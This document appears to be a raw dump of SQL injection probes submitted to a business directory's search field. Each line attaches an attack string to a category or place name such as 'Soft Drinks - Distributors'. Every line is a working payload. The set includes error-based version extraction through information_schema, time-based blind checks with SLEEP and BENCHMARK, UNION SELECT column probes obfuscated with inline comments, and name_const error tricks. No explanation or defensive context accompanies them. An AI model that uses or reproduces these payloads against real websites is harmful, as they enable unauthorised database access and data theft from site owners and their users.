Office Equipment Servicing and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(vErsion(),0x27,0x7e) LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) a

Office Equipment Servicing' AND SLEEP(3)) GrOup BY 103 /*

Office Equipment Servicing' And SLeep(3)) Uni/**/ON SEl/**/eCT

Office Equipment Servicing' AND 1=2) Uni/**/ON SEl/**/eCT 0x646665743166657274,0x646665743266657274,0x646665743366657274,0x646665743466657274,0x646665743566657274,0x646665743666657274,0x646665743766657274,0x646665743866657274,0x646665743966657274,0x6 		1

Office Equipment Servicing' And SLeep(3)) Uni/**/ON SEl/**/eCT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,6 		1

Heat Treatment - Metals1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /*

Soft Drinks - Distributors and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(vErsion(),0x27,0x7e) LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) a 

Heat Treatment - Metals1111111111111' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by 'as /* 

Soft Drinks - Distributors' AnD sLeep(3) ANd '1
Soft Drinks - Distributors'&&sLEEp(3)&&'1
Soft Drinks - Distributors'||SLeeP(3)&&'1
Soft Drinks - Distributors' aND BeNChMaRK(2999999,Md5(NoW())) AnD '1
Soft Drinks - Distributors'&&BeNChMaRK(2999999,mD5(NOW()))&&'1

Heat Treatment - Metals1111111111111 UNION SELECT CHAR(45,120,49,45,81,45) -- /*
Heat Treatment - Metals1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /*
Heat Treatment - Metals1111111111111' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by 'as /*
Heat Treatment - Metals1111111111111" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by "as /* 

Soft Drinks - Distributors1111111111111 UNION SELECT CHAR(45,120,49,45,81,45) -- /* 		
Soft Drinks - Distributors1111111111111' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by 'as /*
Soft Drinks - Distributors1111111111111" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by "as /*
Soft Drinks - Distributors or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1
Soft Drinks - Distributors' or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- 'x'='x
Soft Drinks - Distributors" or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- "x"="x
Soft Drinks - Distributors999999.1 union select unhex(hex(version())) -- and 1=1 		
Soft Drinks - Distributors99999' union select unhex(hex(version())) -- 'x'='x 		
Soft Drinks - Distributors99999" union select unhex(hex(version())) -- "x"="x 		
Soft Drinks - Distributors999999.1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,'ololo',0x27,0x7e) FROM information_schema.schemata LIMIT 1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x f 
Furniture Mnfrs - Home' AnD sLeep(3) ANd '1 		
Furniture Mnfrs - Home'&&sLEEp(3)&&'1 		
Furniture Mnfrs - Home'||SLeeP(3)&&'1 		
Furniture Mnfrs - Home' aND BeNChMaRK(2999999,Md5(NoW())) AnD ' 		
Furniture Mnfrs - Home'&&BeNChMaRK(2999999,mD5(NOW()))&&'1 		
Furniture Mnfrs - Home and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(vErsion(),0x27,0x7e) LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1 
Grange-over-Sands or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1
Grange-over-Sands' or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- 'x'='x 
Furniture Mnfrs - Home999999.1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,'ololo',0x27,0x7e) FROM information_schema.schemata LIMIT 1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
Dance%'/**/aND/**/'8%'='3
Dance%'/**/aND/**/'8'='8
Dance'`([{^~
Dance aND 8=8
Electric Vehicles'&&BeNChMaRK(2999999,mD5(NOW()))&&'1
Electric Vehicles99999' union select unhex(hex(version())) -- 'x'='x 
Electric Vehicles999999.1 union select unhex(hex(version())) -- and 1=1
mmm' or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- 'x'='x
Electric Vehicles" or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- "x"="x 
Electric Vehicles999999.1 union select unhex(hex(version())) -- and 1=1 
'||SLeeP(3)&&'1
